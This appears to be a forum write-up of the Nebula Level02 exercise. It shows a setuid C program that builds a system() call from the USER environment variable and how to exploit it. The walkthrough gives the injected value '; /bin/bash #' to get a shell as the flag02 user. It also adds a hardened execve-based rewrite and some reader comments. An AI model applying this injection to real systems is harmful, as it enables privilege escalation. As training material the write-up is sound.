How to pwn Nebula: Level02 - Environment Variable

Exploit-Exercises: Nebula


Introduction


In this level there is a weakness in the program; we will use that weakness to get a shell as the flag02 user.

Level02 - Environment Variable

Exploit-Exercises gives us the source code. We can analyse the code:

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
  char *buffer;

  gid_t gid;
  uid_t uid;

  gid = getegid();
  uid = geteuid();

  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

  buffer = NULL;

  asprintf(&buffer, "/bin/echo %s is cool", getenv("USER"));
  printf("about to call system(\"%s\")\n", buffer);
  
  system(buffer);
}

The following lines are what we should look at to pwn this level:

  asprintf(&buffer, "/bin/echo %s is cool", getenv("USER"));
  printf("about to call system(\"%s\")\n", buffer);

The program simply runs echo and prints the content of the USER variable.

To take advantage of this variable, we will set the USER variable to our own content. Let’s try to inject the string Hacker.

Well, this is good, but now we want a shell.
Use the export command and inject “; /bin/bash #”; this will run a shell and comment out the “is cool” part.

You successfully injected code and pwned level02!

3 Likes
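For the defensive side of this level, here is a hardened rewrite of the `system(buffer)` call, added as an example (it is not from the original post or from the Nebula source). The function names and the username policy are assumptions: the name comes from the passwd database rather than `getenv("USER")`, is checked against an allowlist, and is passed to `/bin/echo` as a single argv element with no shell involved.

```c
#include <ctype.h>
#include <pwd.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Assumed policy: 1-32 chars, first is a letter or '_', rest [A-Za-z0-9_.-]. */
int is_plain_username(const char *s)
{
    size_t i;
    if (s == NULL || !(isalpha((unsigned char)s[0]) || s[0] == '_'))
        return 0;
    for (i = 1; s[i] != '\0'; i++)
        if (i >= 32 || !(isalnum((unsigned char)s[i]) ||
                         s[i] == '_' || s[i] == '.' || s[i] == '-'))
            return 0;
    return 1;
}

/* Replacement for system("/bin/echo <name> is cool"): no shell parses the
 * string, so ';' and '#' have no special meaning. Returns echo's exit
 * status, or -1 if the name is rejected or the child could not be run. */
int echo_is_cool(const char *name)
{
    int status;
    pid_t pid;
    if (!is_plain_username(name))
        return -1;
    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = {"/bin/echo", (char *)name, "is", "cool", NULL};
        char *const envp[] = {"PATH=/usr/bin:/bin", NULL}; /* fixed, minimal */
        execve("/bin/echo", argv, envp);
        _exit(127);                        /* only reached if execve failed */
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Real UID -> passwd entry: the caller cannot change this via env. */
    struct passwd *pw = getpwuid(getuid());
    return (pw && echo_is_cool(pw->pw_name) == 0) ? 0 : 1;
}
```
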

Where can the info about logging into this nebula server be found?

All the info is on the official website, Exploit-Exercises. You should download and run it.

This is really cool, I never thought about using bash environment variables for code injection!

1 Like
